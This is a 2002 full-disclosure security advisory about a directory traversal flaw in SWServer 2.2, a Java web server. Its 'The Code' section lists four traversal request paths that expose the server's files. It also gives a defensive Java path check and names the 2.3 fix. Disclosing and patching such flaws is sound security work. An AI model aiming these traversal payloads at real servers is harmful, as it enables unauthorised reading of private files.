SWServer 2.2 directory traversal bug

From: Bugtest (aluigi@pivx.com)
Date: 08/28/02


From: Bugtest <aluigi@pivx.com>
To: bugtraq@securityfocus.com
Date: Wed, 28 Aug 2002 19:46:58 +0000


######################################################################

Auriemma Luigi, PivX security advisory

Application: SWServer
             (http://www.geocities.com/tlhome2000/swserver.html)
Version: 2.2 and previous
Bug: Directory traversal bug
Risk (high): An attacker can view and "surf" in the directories of the
             remote server and view all the files in it.
Author: Auriemma Luigi, Security Researcher, PivX Solutions, LLC
             e-mail: aluigi@pivx.com

######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix
5) Philosophy

______________________________________________________________________

1) Introduction

SWServer is a small free web server written entirely in Java.
It can be considered a tiny web server for testing, or for use by
single users who don't want to lose time on configuration files.

______________________________________________________________________

2) Bug

The bug is a directory traversal that lets the attacker use the
remote server like a new read-only drive, all readable with a browser.

The bad characters that can be used to exploit the vulnerability are
'\' (%5c) and '/' (%2f).

______________________________________________________________________

3) The Code

I suggest trying only these links and then following the directories
with the browser:

http://host/%2f%2e%2e%2f
http://host/%5c%2e%2e%5c
http://host/..\
http://host/../
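
For server authors, a sketch of the request-path check that refuses
all four requests above. This is an added example, not SWServer code
and not the change made in 2.3; the class name, DOC_ROOT and the
resolve() helper are assumptions, and the input is assumed to be the
URL path only, without a query string.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example: confine a requested path to the document root.
public class SafeResolve {
    // Assumed document root; a real server would read it from its config.
    static final Path DOC_ROOT = Paths.get("/srv/www").toAbsolutePath().normalize();

    /** Returns the path to serve, or null when the request must be refused. */
    static Path resolve(String rawRequestPath) {
        String decoded;
        try {
            // Decode percent-escapes exactly once, BEFORE any path check, so
            // %2f, %5c and %2e are seen as '/', '\' and '.'.
            // '+' is protected first because URLDecoder maps it to a space.
            decoded = URLDecoder.decode(rawRequestPath.replace("+", "%2B"),
                                        StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return null; // malformed escape such as "%zz"
        }
        // '\' is a separator on Windows and has no place in a URL path;
        // NUL can truncate file names in lower layers.
        if (decoded.indexOf('\\') >= 0 || decoded.indexOf('\0') >= 0) {
            return null;
        }
        // Strip leading slashes so the request is always relative to DOC_ROOT.
        String relative = decoded.replaceAll("^/+", "");
        try {
            // normalize() collapses "." and ".." lexically; the containment
            // test compares whole path components, not string prefixes.
            Path candidate = DOC_ROOT.resolve(relative).normalize();
            return candidate.startsWith(DOC_ROOT) ? candidate : null;
        } catch (InvalidPathException e) {
            return null;
        }
    }

    public static void main(String[] args) {
        // The four request paths from the advisory plus two benign ones.
        String[] requests = { "/index.html", "/docs/../index.html",
            "/%2f%2e%2e%2f", "/%5c%2e%2e%5c", "/..\\", "/../" };
        for (String r : requests) {
            Path p = resolve(r);
            System.out.println(r + " -> " + (p == null ? "REFUSED" : p));
        }
    }
}
```

The check is lexical only; where the document root may contain
symbolic links, compare Path.toRealPath() results as well.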

______________________________________________________________________

4) Fix

SWserver 2.3 from its homepage:

http://www.geocities.com/tlhome2000/swserver.html

______________________________________________________________________

5) Philosophy

I'm really hopeful about the FULL-DISCLOSURE policy, because with it
"everyone" can know the real effects of an attack, the real danger of
a bug, someone can learn a bit of creative programming (I have learned
a bit of interesting C from the source code of some published
exploits under this policy) and it's useful for all the people that
are hopeful in this type of disclosure.
No secrets!

______________________________________________________________________

About PivX Solutions
PivX Solutions is a premier network security consultancy offering a
myriad of network security services to our clients, the most notable
being our proprietary Risk and Vulnerability Assessment (RAVA).
Dedicated PivX founders have also developed the patented Invisiwall
network security device which offers the most comprehensive and secure
intrusion detection system available.

For more information go to http://www.PivX.com

Any type of feedback is really welcome!

Byez

-- 
PivX Security Researcher


